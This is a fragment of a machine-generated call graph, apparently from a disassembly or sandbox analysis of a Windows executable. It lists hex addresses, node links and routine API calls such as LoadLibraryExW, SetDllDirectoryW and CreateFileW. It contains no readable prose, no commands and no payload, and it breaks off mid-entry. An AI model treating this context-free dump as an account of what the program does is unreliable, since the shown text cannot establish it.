7ff6ba3b4f08 11 API calls memcpy_s 99959->99984 99960 7ff6ba3a4616 99960->99904 99964 7ff6ba3b5f55 99977 7ff6ba3bfecc 99964->99977 99965 7ff6ba3b5f48 99985 7ff6ba3b4f08 11 API calls memcpy_s 99965->99985 99968 7ff6ba3b5f68 99986 7ff6ba3b5478 LeaveCriticalSection 99968->99986 99987 7ff6ba3c02d8 EnterCriticalSection 99970->99987 99972 7ff6ba3bac3f 99973 7ff6ba3bac9c 19 API calls 99972->99973 99974 7ff6ba3bac4a 99973->99974 99975 7ff6ba3c0338 _isindst LeaveCriticalSection 99974->99975 99976 7ff6ba3b5f3e 99975->99976 99976->99964 99976->99965 99988 7ff6ba3bfbc8 99977->99988 99980 7ff6ba3bff26 99980->99968 99982->99956 99983->99960 99984->99960 99985->99960 99989 7ff6ba3bfc03 __vcrt_FlsAlloc 99988->99989 99998 7ff6ba3bfdca 99989->99998 100003 7ff6ba3b7a3c 51 API calls 3 library calls 99989->100003 99991 7ff6ba3bfea1 100007 7ff6ba3ba8e0 37 API calls _invalid_parameter_noinfo 99991->100007 99993 7ff6ba3bfdd3 99993->99980 100000 7ff6ba3c6d54 99993->100000 99995 7ff6ba3bfe35 99995->99998 100004 7ff6ba3b7a3c 51 API calls 3 library calls 99995->100004 99997 7ff6ba3bfe54 99997->99998 100005 7ff6ba3b7a3c 51 API calls 3 library calls 99997->100005 99998->99993 100006 7ff6ba3b4f08 11 API calls memcpy_s 99998->100006 100008 7ff6ba3c6354 100000->100008 100003->99995 100004->99997 100005->99998 100006->99991 100007->99993 100009 7ff6ba3c6389 100008->100009 100010 7ff6ba3c636b 100008->100010 100009->100010 100013 7ff6ba3c63a5 100009->100013 100062 7ff6ba3b4f08 11 API calls memcpy_s 100010->100062 100012 7ff6ba3c6370 100063 7ff6ba3ba8e0 37 API calls _invalid_parameter_noinfo 100012->100063 100019 7ff6ba3c6964 100013->100019 100017 7ff6ba3c637c 100017->99980 100065 7ff6ba3c6698 100019->100065 100022 7ff6ba3c69f1 100085 7ff6ba3b8520 100022->100085 100023 7ff6ba3c69d9 100097 7ff6ba3b4ee8 11 API calls memcpy_s 100023->100097 100026 7ff6ba3c69de 100098 7ff6ba3b4f08 11 API calls memcpy_s 100026->100098 100054 7ff6ba3c63d0 100054->100017 100064 7ff6ba3b84f8 LeaveCriticalSection 100054->100064 100062->100012 100063->100017 100066 7ff6ba3c66c4 100065->100066 100073 7ff6ba3c66de 100065->100073 100066->100073 100110 7ff6ba3b4f08 11 API calls memcpy_s 100066->100110 100068 7ff6ba3c66d3 100111 7ff6ba3ba8e0 37 API calls _invalid_parameter_noinfo 100068->100111 100070 7ff6ba3c67ad 100083 7ff6ba3c680a 100070->100083 100116 7ff6ba3b9b78 37 API calls 2 library calls 100070->100116 100071 7ff6ba3c675c 100071->100070 100114 7ff6ba3b4f08 11 API calls memcpy_s 100071->100114 100073->100071 100112 7ff6ba3b4f08 11 API calls memcpy_s 100073->100112 100075 7ff6ba3c6806 100078 7ff6ba3c6888 100075->100078 100075->100083 100077 7ff6ba3c67a2 100115 7ff6ba3ba8e0 37 API calls _invalid_parameter_noinfo 100077->100115 100117 7ff6ba3ba900 17 API calls __GetCurrentState 100078->100117 100079 7ff6ba3c6751 100113 7ff6ba3ba8e0 37 API calls _invalid_parameter_noinfo 100079->100113 100083->100022 100083->100023 100118 7ff6ba3c02d8 EnterCriticalSection 100085->100118 100097->100026 100098->100054 100110->100068 100111->100073 100112->100079 100113->100071 100114->100077 100115->100070 100116->100075 100120 7ff6ba3b04ce 100119->100120 100121 7ff6ba3b048e 100119->100121 100120->100121 100123 7ff6ba3b04da 100120->100123 100131 7ff6ba3ba814 37 API calls 2 library calls 100121->100131 100130 7ff6ba3b546c EnterCriticalSection 100123->100130 100125 7ff6ba3b04df 100127 7ff6ba3b05e8 71 API calls 100125->100127 100126 7ff6ba3b04b5 100126->99909 100128 7ff6ba3b04f1 100127->100128 100129 7ff6ba3b5478 _fread_nolock LeaveCriticalSection 100128->100129 100129->100126 100131->100126 100133 7ff6ba3b0b0c 100132->100133 100142 7ff6ba3b082c 100133->100142 100135 7ff6ba3b0b2a 100135->99927 100136->99915 100137->99919 100138->99926 100139->99923 100140->99926 100141->99926 100143 7ff6ba3b084c 100142->100143 100144 7ff6ba3b0879 100142->100144 100143->100144 100145 7ff6ba3b0881 100143->100145 100146 7ff6ba3b0856 100143->100146 100144->100135 100149 7ff6ba3b076c 100145->100149 100156 7ff6ba3ba814 37 API calls 2 library calls 100146->100156 100157 7ff6ba3b546c EnterCriticalSection 100149->100157 100151 7ff6ba3b0789 100152 7ff6ba3b07ac 74 API calls 100151->100152 100153 7ff6ba3b0792 100152->100153 100154 7ff6ba3b5478 _fread_nolock LeaveCriticalSection 100153->100154 100155 7ff6ba3b079d 100154->100155 100155->100144 100156->100144 100159 7ff6ba3afe71 100158->100159 100160 7ff6ba3afe43 100158->100160 100167 7ff6ba3afe63 100159->100167 100168 7ff6ba3b546c EnterCriticalSection 100159->100168 100169 7ff6ba3ba814 37 API calls 2 library calls 100160->100169 100163 7ff6ba3afe88 100164 7ff6ba3afea4 72 API calls 100163->100164 100165 7ff6ba3afe94 100164->100165 100166 7ff6ba3b5478 _fread_nolock LeaveCriticalSection 100165->100166 100166->100167 100167->99935 100169->100167 100171 7ff6ba3b03e6 100170->100171 100182 7ff6ba3b03b4 100170->100182 100172 7ff6ba3b0432 100171->100172 100174 7ff6ba3b03f5 memcpy_s 100171->100174 100171->100182 100183 7ff6ba3b546c EnterCriticalSection 100172->100183 100184 7ff6ba3b4f08 11 API calls memcpy_s 100174->100184 100176 7ff6ba3b043a 100178 7ff6ba3b013c _fread_nolock 51 API calls 100176->100178 100177 7ff6ba3b040a 100185 7ff6ba3ba8e0 37 API calls _invalid_parameter_noinfo 100177->100185 100180 7ff6ba3b0451 100178->100180 100181 7ff6ba3b5478 _fread_nolock LeaveCriticalSection 100180->100181 100181->100182 100182->99861 100184->100177 100185->100182 100187 7ff6ba3b49de 100186->100187 100188 7ff6ba3b4a03 100187->100188 100190 7ff6ba3b4a3f 100187->100190 100204 7ff6ba3ba814 37 API calls 2 library calls 100188->100204 100205 7ff6ba3b2c10 49 API calls _invalid_parameter_noinfo 100190->100205 100192 7ff6ba3b4a2d 100193 7ff6ba3ac550 _log10_special 8 API calls 100192->100193 100195 7ff6ba3a1cc8 100193->100195 100195->99827 100196 7ff6ba3b4ad6 100197 7ff6ba3b4b40 100196->100197 100198 7ff6ba3b4af1 100196->100198 100199 7ff6ba3b4b1c 100196->100199 100200 7ff6ba3b4ae8 100196->100200 100197->100199 100201 7ff6ba3b4b4a 100197->100201 100206 7ff6ba3ba948 11 API calls 2 library calls 100198->100206 100208 7ff6ba3ba948 11 API calls 2 library calls 100199->100208 100200->100198 100200->100199 100207 7ff6ba3ba948 11 API calls 2 library calls 100201->100207 100204->100192 100205->100196 100206->100192 100207->100192 100208->100192 100209->99886 100211 7ff6ba3acc3c 100232 7ff6ba3ace0c 100211->100232 100214 7ff6ba3acd88 100383 7ff6ba3ad12c 7 API calls 2 library calls 100214->100383 100215 7ff6ba3acc58 __scrt_acquire_startup_lock 100217 7ff6ba3acd92 100215->100217 100222 7ff6ba3acc76 __scrt_release_startup_lock 100215->100222 100384 7ff6ba3ad12c 7 API calls 2 library calls 100217->100384 100219 7ff6ba3acc9b 100220 7ff6ba3acd9d __GetCurrentState 100221 7ff6ba3acd21 100238 7ff6ba3ad274 100221->100238 100222->100219 100222->100221 100380 7ff6ba3b9b2c 45 API calls 100222->100380 100224 7ff6ba3acd26 100241 7ff6ba3a1000 100224->100241 100229 7ff6ba3acd49 100229->100220 100382 7ff6ba3acf90 7 API calls 100229->100382 100231 7ff6ba3acd60 100231->100219 100233 7ff6ba3ace14 100232->100233 100234 7ff6ba3ace20 __scrt_dllmain_crt_thread_attach 100233->100234 100235 7ff6ba3acc50 100234->100235 100236 7ff6ba3ace2d 100234->100236 100235->100214 100235->100215 100236->100235 100385 7ff6ba3ad888 7 API calls 2 library calls 100236->100385 100386 7ff6ba3ca4d0 100238->100386 100240 7ff6ba3ad28b GetStartupInfoW 100240->100224 100242 7ff6ba3a1009 100241->100242 100388 7ff6ba3b5484 100242->100388 100244 7ff6ba3a37fb 100395 7ff6ba3a36b0 100244->100395 100248 7ff6ba3ac550 _log10_special 8 API calls 100250 7ff6ba3a3ca7 100248->100250 100381 7ff6ba3ad2b8 GetModuleHandleW 100250->100381 100251 7ff6ba3a391b 100253 7ff6ba3a45c0 108 API calls 100251->100253 100252 7ff6ba3a383c 100254 7ff6ba3a1c80 49 API calls 100252->100254 100255 7ff6ba3a392b 100253->100255 100256 7ff6ba3a385b 100254->100256 100257 7ff6ba3a396a 100255->100257 100490 7ff6ba3a7f90 100255->100490 100467 7ff6ba3a8830 100256->100467 100499 7ff6ba3a2710 54 API calls _log10_special 100257->100499 100261 7ff6ba3a388e 100268 7ff6ba3a38bb __std_exception_destroy 100261->100268 100489 7ff6ba3a89a0 40 API calls __std_exception_destroy 100261->100489 100262 7ff6ba3a395d 100263 7ff6ba3a3962 100262->100263 100264 7ff6ba3a3984 100262->100264 100266 7ff6ba3b004c 74 API calls 100263->100266 100267 7ff6ba3a1c80 49 API calls 100264->100267 100266->100257 100269 7ff6ba3a39a3 100267->100269 100270 7ff6ba3a8830 14 API calls 100268->100270 100278 7ff6ba3a38de __std_exception_destroy 100268->100278 100273 7ff6ba3a1950 115 API calls 100269->100273 100270->100278 100272 7ff6ba3a3a0b 100502 7ff6ba3a89a0 40 API calls __std_exception_destroy 100272->100502 100275 7ff6ba3a39ce 100273->100275 100275->100256 100277 7ff6ba3a39de 100275->100277 100276 7ff6ba3a3a17 100503 7ff6ba3a89a0 40 API calls __std_exception_destroy 100276->100503 100500 7ff6ba3a2710 54 API calls _log10_special 100277->100500 100283 7ff6ba3a390e __std_exception_destroy 100278->100283 100501 7ff6ba3a8940 40 API calls __std_exception_destroy 100278->100501 100281 7ff6ba3a3a23 100504 7ff6ba3a89a0 40 API calls __std_exception_destroy 100281->100504 100284 7ff6ba3a8830 14 API calls 100283->100284 100285 7ff6ba3a3a3b 100284->100285 100286 7ff6ba3a3b2f 100285->100286 100287 7ff6ba3a3a60 __std_exception_destroy 100285->100287 100506 7ff6ba3a2710 54 API calls _log10_special 100286->100506 100294 7ff6ba3a3aab 100287->100294 100505 7ff6ba3a8940 40 API calls __std_exception_destroy 100287->100505 100290 7ff6ba3a8830 14 API calls 100291 7ff6ba3a3bf4 __std_exception_destroy 100290->100291 100292 7ff6ba3a3d41 100291->100292 100293 7ff6ba3a3c46 100291->100293 100511 7ff6ba3a44e0 49 API calls 100292->100511 100295 7ff6ba3a3c50 100293->100295 100296 7ff6ba3a3cd4 100293->100296 100294->100290 100507 7ff6ba3a90e0 59 API calls _log10_special 100295->100507 100298 7ff6ba3a8830 14 API calls 100296->100298 100304 7ff6ba3a3ce0 100298->100304 100300 7ff6ba3a3d4f 100302 7ff6ba3a3d71 100300->100302 100303 7ff6ba3a3d65 100300->100303 100301 7ff6ba3a3c55 100306 7ff6ba3a3c61 100301->100306 100307 7ff6ba3a3cb3 100301->100307 100305 7ff6ba3a1c80 49 API calls 100302->100305 100512 7ff6ba3a4630 100303->100512 100304->100306 100310 7ff6ba3a3ced 100304->100310 100320 7ff6ba3a3d2b __std_exception_destroy 100305->100320 100508 7ff6ba3a2710 54 API calls _log10_special 100306->100508 100509 7ff6ba3a8660 86 API calls 2 library calls 100307->100509 100313 7ff6ba3a1c80 49 API calls 100310->100313 100311 7ff6ba3a3dc4 100316 7ff6ba3a9390 2 API calls 100311->100316 100312 7ff6ba3a3cbb 100317 7ff6ba3a3cbf 100312->100317 100318 7ff6ba3a3cc8 100312->100318 100315 7ff6ba3a3d0b 100313->100315 100319 7ff6ba3a3d12 100315->100319 100315->100320 100322 7ff6ba3a3dd7 SetDllDirectoryW 100316->100322 100317->100306 100318->100320 100510 7ff6ba3a2710 54 API calls _log10_special 100319->100510 100320->100311 100321 7ff6ba3a3da7 SetDllDirectoryW LoadLibraryExW 100320->100321 100321->100311 100326 7ff6ba3a3e0a 100322->100326 100368 7ff6ba3a3e5a 100322->100368 100325 7ff6ba3a3808 __std_exception_destroy 100325->100248 100328 7ff6ba3a8830 14 API calls 100326->100328 100327 7ff6ba3a4008 100330 7ff6ba3a4012 PostMessageW GetMessageW 100327->100330 100331 7ff6ba3a4035 100327->100331 100334 7ff6ba3a3e16 __std_exception_destroy 100328->100334 100329 7ff6ba3a3f1b 100523 7ff6ba3a33c0 121 API calls 2 library calls 100329->100523 100330->100331 100480 7ff6ba3a3360 100331->100480 100333 7ff6ba3a3f23 100333->100325 100335 7ff6ba3a3f2b 100333->100335 100338 7ff6ba3a3ef2 100334->100338 100342 7ff6ba3a3e4e 100334->100342 100524 7ff6ba3a90c0 LocalFree 100335->100524 100522 7ff6ba3a8940 40 API calls __std_exception_destroy 100338->100522 100342->100368 100515 7ff6ba3a6dc0 54 API calls memcpy_s 100342->100515 100344 7ff6ba3a404f 100526 7ff6ba3a6fc0 FreeLibrary 100344->100526 100350 7ff6ba3a405b 100353 7ff6ba3a3e6c 100516 7ff6ba3a7340 117 API calls 2 library calls 100353->100516 100357 7ff6ba3a3e81 100359 7ff6ba3a3ea2 100357->100359 100371 7ff6ba3a3e85 100357->100371 100517 7ff6ba3a6e00 120 API calls _log10_special 100357->100517 100359->100371 100518 7ff6ba3a71b0 125 API calls 100359->100518 100363 7ff6ba3a3eb7 100363->100371 100519 7ff6ba3a74f0 55 API calls 100363->100519 100365 7ff6ba3a3ee0 100521 7ff6ba3a6fc0 FreeLibrary 100365->100521 100368->100327 100368->100329 100371->100368 100520 7ff6ba3a2a50 54 API calls _log10_special 100371->100520 100380->100221 100381->100229 100382->100231 100383->100217 100384->100220 100385->100235 100387 7ff6ba3ca4c0 100386->100387 100387->100240 100387->100387 100389 7ff6ba3bf480 100388->100389 100390 7ff6ba3bf4d3 100389->100390 100392 7ff6ba3bf526 100389->100392 100527 7ff6ba3ba814 37 API calls 2 library calls 100390->100527 100528 7ff6ba3bf358 71 API calls _fread_nolock 100392->100528 100394 7ff6ba3bf4fc 100394->100244 100529 7ff6ba3ac850 100395->100529 100397 7ff6ba3a36bc GetModuleFileNameW 100398 7ff6ba3a3710 100397->100398 100399 7ff6ba3a36eb GetLastError 100397->100399 100531 7ff6ba3a9280 FindFirstFileExW 100398->100531 100536 7ff6ba3a2c50 51 API calls _log10_special 100399->100536 100403 7ff6ba3a3723 100537 7ff6ba3a9300 CreateFileW GetFinalPathNameByHandleW CloseHandle 100403->100537 100404 7ff6ba3a377d 100539 7ff6ba3a9440 WideCharToMultiByte WideCharToMultiByte __std_exception_destroy 100404->100539 100406 7ff6ba3ac550 _log10_special 8 API calls 100408 7ff6ba3a37b5 100406->100408 100408->100325 100417 7ff6ba3a1950 100408->100417 100409 7ff6ba3a3730 100412 7ff6ba3a3734 100409->100412 100413 7ff6ba3a374c __vcrt_FlsAlloc 100409->100413 100410 7ff6ba3a378b 100411 7ff6ba3a3706 100410->100411 100540 7ff6ba3a2810 49 API calls _log10_special 100410->100540 100411->100406 100538 7ff6ba3a2810 49 API calls _log10_special 100412->100538 100413->100404 100416 7ff6ba3a3745 100416->100411 100418 7ff6ba3a45c0 108 API calls 100417->100418 100419 7ff6ba3a1985 100418->100419 100420 7ff6ba3a1c43 100419->100420 100422 7ff6ba3a7f90 83 API calls 100419->100422 100421 7ff6ba3ac550 _log10_special 8 API calls 100420->100421 100423 7ff6ba3a1c5e 100421->100423 100424 7ff6ba3a19cb 100422->100424 100423->100251 100423->100252 100425 7ff6ba3b06d4 73 API calls 100424->100425 100466 7ff6ba3a1a03 100424->100466 100427 7ff6ba3a19e5 100425->100427 100426 7ff6ba3b004c 74 API calls 100426->100420 100428 7ff6ba3a19e9 100427->100428 100429 7ff6ba3a1a08 100427->100429 100541 7ff6ba3b4f08 11 API calls memcpy_s 100428->100541 100431 7ff6ba3b039c _fread_nolock 53 API calls 100429->100431 100433 7ff6ba3a1a20 100431->100433 100432 7ff6ba3a19ee 100542 7ff6ba3a2910 54 API calls _log10_special 100432->100542 100435 7ff6ba3a1a45 100433->100435 100436 7ff6ba3a1a26 100433->100436 100440 7ff6ba3a1a7b 100435->100440 100441 7ff6ba3a1a5c 100435->100441 100543 7ff6ba3b4f08 11 API calls memcpy_s 100436->100543 100438 7ff6ba3a1a2b 100544 7ff6ba3a2910 54 API calls _log10_special 100438->100544 100443 7ff6ba3a1c80 49 API calls 100440->100443 100545 7ff6ba3b4f08 11 API calls memcpy_s 100441->100545 100445 7ff6ba3a1a92 100443->100445 100444 7ff6ba3a1a61 100546 7ff6ba3a2910 54 API calls _log10_special 100444->100546 100447 7ff6ba3a1c80 49 API calls 100445->100447 100448 7ff6ba3a1add 100447->100448 100449 7ff6ba3b06d4 73 API calls 100448->100449 100450 7ff6ba3a1b01 100449->100450 100451 7ff6ba3a1b35 100450->100451 100452 7ff6ba3a1b16 100450->100452 100453 7ff6ba3b039c _fread_nolock 53 API calls 100451->100453 100547 7ff6ba3b4f08 11 API calls memcpy_s 100452->100547 100455 7ff6ba3a1b4a 100453->100455 100458 7ff6ba3a1b6f 100455->100458 100459 7ff6ba3a1b50 100455->100459 100456 7ff6ba3a1b1b 100548 7ff6ba3a2910 54 API calls _log10_special 100456->100548 100551 7ff6ba3b0110 37 API calls 2 library calls 100458->100551 100549 7ff6ba3b4f08 11 API calls memcpy_s 100459->100549 100462 7ff6ba3a1b55 100550 7ff6ba3a2910 54 API calls _log10_special 100462->100550 100463 7ff6ba3a1b89 100463->100466 100552 7ff6ba3a2710 54 API calls _log10_special 100463->100552 100466->100426 100468 7ff6ba3a883a 100467->100468 100469 7ff6ba3a9390 2 API calls 100468->100469 100470 7ff6ba3a8859 GetEnvironmentVariableW 100469->100470 100471 7ff6ba3a88c2 100470->100471 100472 7ff6ba3a8876 ExpandEnvironmentStringsW 100470->100472 100474 7ff6ba3ac550 _log10_special 8 API calls 100471->100474 100472->100471 100473 7ff6ba3a8898 100472->100473 100553 7ff6ba3a9440 WideCharToMultiByte WideCharToMultiByte __std_exception_destroy 100473->100553 100476 7ff6ba3a88d4 100474->100476 100476->100261 100477 7ff6ba3a88aa 100478 7ff6ba3ac550 _log10_special 8 API calls 100477->100478 100479 7ff6ba3a88ba 100478->100479 100479->100261 100554 7ff6ba3a6360 100480->100554 100484 7ff6ba3a3381 100488 7ff6ba3a3399 100484->100488 100622 7ff6ba3a6050 100484->100622 100486 7ff6ba3a338d 100486->100488 100631 7ff6ba3a61e0 54 API calls 100486->100631 100525 7ff6ba3a3670 FreeLibrary 100488->100525 100489->100268 100491 7ff6ba3a7fb4 100490->100491 100492 7ff6ba3b06d4 73 API calls 100491->100492 100495 7ff6ba3a808b __std_exception_destroy 100491->100495 100493 7ff6ba3a7fd0 100492->100493 100493->100495 100685 7ff6ba3b78c8 100493->100685 100495->100262 100496 7ff6ba3b06d4 73 API calls 100498 7ff6ba3a7fe5 100496->100498 100497 7ff6ba3b039c _fread_nolock 53 API calls 100497->100498 100498->100495 100498->100496 100498->100497 100499->100325 100500->100325 100501->100272 100502->100276 100503->100281 100504->100283 100505->100294 100506->100325 100507->100301 100508->100325 100509->100312 100510->100325 100511->100300 100513 7ff6ba3a1c80 49 API calls 100512->100513 100514 7ff6ba3a4660 100513->100514 100514->100320 100515->100353 100516->100357 100517->100359 100518->100363 100519->100371 100520->100365 100521->100368 100522->100368 100523->100333 100525->100344 100526->100350 100527->100394 100528->100394 100530 7ff6ba3ac87a 100529->100530 100530->100397 100530->100530 100532 7ff6ba3a92d2 100531->100532 100533 7ff6ba3a92bf FindClose 100531->100533 100534 7ff6ba3ac550 _log10_special 8 API calls 100532->100534 100533->100532 100535 7ff6ba3a371a 100534->100535 100535->100403 100535->100404 100536->100411 100537->100409 100538->100416 100539->100410 100540->100411 100541->100432 100542->100466 100543->100438 100544->100466 100545->100444 100546->100466 100547->100456 100548->100466 100549->100462 100550->100466 100551->100463 100552->100466 100553->100477 100555 7ff6ba3a6375 100554->100555 100556 7ff6ba3a1c80 49 API calls 100555->100556 100557 7ff6ba3a63b1 100556->100557 100558 7ff6ba3a63ba 100557->100558 100559 7ff6ba3a63dd 100557->100559 100642 7ff6ba3a2710 54 API calls _log10_special 100558->100642 100561 7ff6ba3a4630 49 API calls 100559->100561 100562 7ff6ba3a63f5 100561->100562 100563 7ff6ba3a6413 100562->100563 100643 7ff6ba3a2710 54 API calls _log10_special 100562->100643 100632 7ff6ba3a4560 100563->100632 100564 7ff6ba3ac550 _log10_special 8 API calls 100567 7ff6ba3a336e 100564->100567 100567->100488 100585 7ff6ba3a6500 100567->100585 100569 7ff6ba3a642b 100570 7ff6ba3a4630 49 API calls 100569->100570 100572 7ff6ba3a6444 100570->100572 100571 7ff6ba3a8e80 3 API calls 100571->100569 100573 7ff6ba3a6469 100572->100573 100574 7ff6ba3a6449 100572->100574 100638 7ff6ba3a8e80 100573->100638 100644 7ff6ba3a2710 54 API calls _log10_special 100574->100644 100577 7ff6ba3a63d3 100577->100564 100578 7ff6ba3a6476 100579 7ff6ba3a64c1 100578->100579 100580 7ff6ba3a6482 100578->100580 100646 7ff6ba3a5830 137 API calls 100579->100646 100581 7ff6ba3a9390 2 API calls 100580->100581 100583 7ff6ba3a649a GetLastError 100581->100583 100645 7ff6ba3a2c50 51 API calls _log10_special 100583->100645 100647 7ff6ba3a5400 100585->100647 100587 7ff6ba3a6526 100588 7ff6ba3a653f 100587->100588 100589 7ff6ba3a652e 100587->100589 100654 7ff6ba3a4c90 100588->100654 100672 7ff6ba3a2710 54 API calls _log10_special 100589->100672 100593 7ff6ba3a654b 100673 7ff6ba3a2710 54 API calls _log10_special 100593->100673 100594 7ff6ba3a655c 100597 7ff6ba3a656c 100594->100597 100599 7ff6ba3a657d 100594->100599 100596 7ff6ba3a653a 100596->100484 100674 7ff6ba3a2710 54 API calls _log10_special 100597->100674 100600 7ff6ba3a65ad 100599->100600 100601 7ff6ba3a659c 100599->100601 100603 7ff6ba3a65cd 100600->100603 100604 7ff6ba3a65bc 100600->100604 100675 7ff6ba3a2710 54 API calls _log10_special 100601->100675 100658 7ff6ba3a4d50 100603->100658 100676 7ff6ba3a2710 54 API calls _log10_special 100604->100676 100608 7ff6ba3a65ed 100611 7ff6ba3a660d 100608->100611 100612 7ff6ba3a65fc 100608->100612 100609 7ff6ba3a65dc 100677 7ff6ba3a2710 54 API calls _log10_special 100609->100677 100614 7ff6ba3a661f 100611->100614 100616 7ff6ba3a6630 100611->100616 100678 7ff6ba3a2710 54 API calls _log10_special 100612->100678 100679 7ff6ba3a2710 54 API calls _log10_special 100614->100679 100619 7ff6ba3a665a 100616->100619 100680 7ff6ba3b72b0 73 API calls 100616->100680 100618 7ff6ba3a6648 100681 7ff6ba3b72b0 73 API calls 100618->100681 100619->100596 100682 7ff6ba3a2710 54 API calls _log10_special 100619->100682 100623 7ff6ba3a6070 100622->100623 100623->100623 100624 7ff6ba3a6099 100623->100624 100630 7ff6ba3a60b0 __std_exception_destroy 100623->100630 100684 7ff6ba3a2710 54 API calls _log10_special 100624->100684 100626 7ff6ba3a60a5 100626->100486 100627 7ff6ba3a61bb 100627->100486 100628 7ff6ba3a1470 116 API calls 100628->100630 100629 7ff6ba3a2710 54 API calls 100629->100630 100630->100627 100630->100628 100630->100629 100631->100488 100633 7ff6ba3a456a 100632->100633 100634 7ff6ba3a9390 2 API calls 100633->100634 100635 7ff6ba3a458f 100634->100635 100636 7ff6ba3ac550 _log10_special 8 API calls 100635->100636 100637 7ff6ba3a45b7 100636->100637 100637->100569 100637->100571 100639 7ff6ba3a9390 2 API calls 100638->100639 100640 7ff6ba3a8e94 LoadLibraryExW 100639->100640 100641 7ff6ba3a8eb3 __std_exception_destroy 100640->100641 100641->100578 100642->100577 100643->100563 100644->100577 100645->100577 100646->100577 100649 7ff6ba3a542c 100647->100649 100648 7ff6ba3a5434 100648->100587 100649->100648 100652 7ff6ba3a55d4 100649->100652 100683 7ff6ba3b6aa4 48 API calls 100649->100683 100650 7ff6ba3a5797 __std_exception_destroy 100650->100587 100651 7ff6ba3a47d0 47 API calls 100651->100652 100652->100650 100652->100651 100655 7ff6ba3a4cc0 100654->100655 100656 7ff6ba3ac550 _log10_special 8 API calls 100655->100656 100657 7ff6ba3a4d2a 100656->100657 100657->100593 100657->100594 100659 7ff6ba3a4d65 100658->100659 100660 7ff6ba3a1c80 49 API calls 100659->100660 100661 7ff6ba3a4db1 100660->100661 100662 7ff6ba3a1c80 49 API calls 100661->100662 100671 7ff6ba3a4e33 __std_exception_destroy 100661->100671 100664 7ff6ba3a4df0 100662->100664 100663 7ff6ba3ac550 _log10_special 8 API calls 100665 7ff6ba3a4e7e 100663->100665 100666 7ff6ba3a9390 2 API calls 100664->100666 100664->100671 100665->100608 100665->100609 100667 7ff6ba3a4e06 100666->100667 100668 7ff6ba3a9390 2 API calls 100667->100668 100669 7ff6ba3a4e1d 100668->100669 100670 7ff6ba3a9390 2 API calls 100669->100670 100670->100671 100671->100663 100672->100596 100673->100596 100674->100596 100675->100596 100676->100596 100677->100596 100678->100596 100679->100596 100680->100618 100681->100619 100682->100596 100683->100649 100684->100626 100686 7ff6ba3b78f8 100685->100686 100689 7ff6ba3b73d4 100686->100689 100688 7ff6ba3b7911 100688->100498 100690 7ff6ba3b741e 100689->100690 100691 7ff6ba3b73ef 100689->100691 100699 7ff6ba3b546c EnterCriticalSection 100690->100699 100700 7ff6ba3ba814 37 API calls 2 library calls 100691->100700 100694 7ff6ba3b740f 100694->100688 100695 7ff6ba3b7423 100696 7ff6ba3b7440 38 API calls 100695->100696 100697 7ff6ba3b742f 100696->100697 100698 7ff6ba3b5478 _fread_nolock LeaveCriticalSection 100697->100698 100698->100694 100700->100694 100701 7ffdfaad8150 100702 7ffdfaad816a 100701->100702 100703 7ffdfaad8180 100702->100703 100705 7ffdfaab112c 100702->100705 100705->100703 100706 7ffdfaabef00 100705->100706 100709 7ffdfaabef30 100706->100709 100708 7ffdfaabef1a 100708->100703 100710 7ffdfaab1325 100709->100710 100711 7ffdfaabef50 SetLastError 100710->100711 100712 7ffdfaabef70 100711->100712 100714 7ffdfaab1c1c 6 API calls 100712->100714 100713 7ffdfaabefac 100713->100708 100714->100713 100715 7ffdfaad8e70 100716 7ffdfaad8e8a 100715->100716 100717 7ffdfaad8ea0 100716->100717 100719 7ffdfaab204a 100716->100719 100719->100717 100720 7ffdfaabf370 100719->100720 100721 7ffdfaabf38a SetLastError 100720->100721 100722 7ffdfaabf3aa 100721->100722 100723 7ffdfaabf3ce 100722->100723 100725 7ffdfaab24aa 100722->100725 100723->100717 100725->100723 100727 7ffdfaaf8010 100725->100727 100728 7ffdfaaf8154 100727->100728 100729 7ffdfaaf820f 100727->100729 100731 7ffdfaab127b 100727->100731 100728->100729 100730 7ffdfaab127b SetLastError 100728->100730 100729->100723 100730->100728 100731->100728 100733 7ffdfaaf8a40 100731->100733 100732 7ffdfaaf8ac3 SetLastError 100732->100733 100734 7ffdfaaf8b27 100732->100734 100733->100732 100733->100734 100734->100728 100735 7ffdfb0e2250 100736 7ffdfb0e22ab 100735->100736 100737 7ffdfb0c6180 new[] 7 API calls 100736->100737 100743 7ffdfb0e2323 100737->100743 100738 7ffdfb0c6180 new[] 7 API calls 100740 7ffdfb0e260a 100738->100740 100739 7ffdfb1f2900 4 API calls 100741 7ffdfb0e23e1 100739->100741 100751 7ffdfb0e23c4 100740->100751 100753 7ffdfb0d92b0 100740->100753 100743->100743 100744 7ffdfb0c6180 new[] 7 API calls 100743->100744 100749 7ffdfb0e2408 100743->100749 100743->100751 100745 7ffdfb0e23b8 100744->100745 100747 7ffdfb0e23fd 00007FFE13343010 100745->100747 100745->100749 100745->100751 100746 7ffdfb0e2665 100750 7ffdfb0e26de 100746->100750 100752 7ffdfb0cd9e0 10 API calls 100746->100752 100747->100749 100749->100738 100749->100750 100749->100751 100750->100751 100773 7ffdfb0d8a10 18 API calls 100750->100773 100751->100739 100752->100750 100754 7ffdfb0d9335 100753->100754 100755 7ffdfb0d948d 100753->100755 100754->100755 100758 7ffdfb0d934e 100754->100758 100756 7ffdfb0d9390 100755->100756 100759 7ffdfb0c6180 new[] 7 API calls 100755->100759 100757 7ffdfb0c6180 new[] 7 API calls 100756->100757 100771 7ffdfb0d95c2 100756->100771 100762 7ffdfb0d93df 100757->100762 100760 7ffdfb0c6180 new[] 7 API calls 100758->100760 100769 7ffdfb0d94c5 100759->100769 100761 7ffdfb0d9369 100760->100761 100763 7ffdfb0d9375 00007FFE13343010 100761->100763 100761->100771 100764 7ffdfb0d9455 00007FFE13343010 100762->100764 100768 7ffdfb0d9679 100762->100768 100762->100771 100763->100756 100765 7ffdfb0d962b 100764->100765 100766 7ffdfb0d9477 00007FFE13343010 100764->100766 100767 7ffdfb0d962e 00007FFE13343010 00007FFE13343010 100765->100767 100766->100767 100767->100768 100768->100771 100774 7ffdfb0cffd0 100768->100774 100769->100756 100769->100769 100769->100771 100785 7ffdfb185ae0 7 API calls 100769->100785 100771->100746 100773->100751 100780 7ffdfb0d0021 100774->100780 100777 7ffdfb1f2900 4 API calls 100778 7ffdfb0d0647 100777->100778 100778->100771 100779 7ffdfb0d03a8 100779->100777 100780->100779 100781 7ffdfb0d01f0 CreateFileW 100780->100781 100783 7ffdfb0d0475 100780->100783 100786 7ffdfb0cd020 100780->100786 100790 7ffdfb0cfa10 9 API calls new[] 100780->100790 100791 7ffdfb0c9340 7 API calls 100780->100791 100781->100780 100792 7ffdfb185ae0 7 API calls 100783->100792 100785->100756 100787 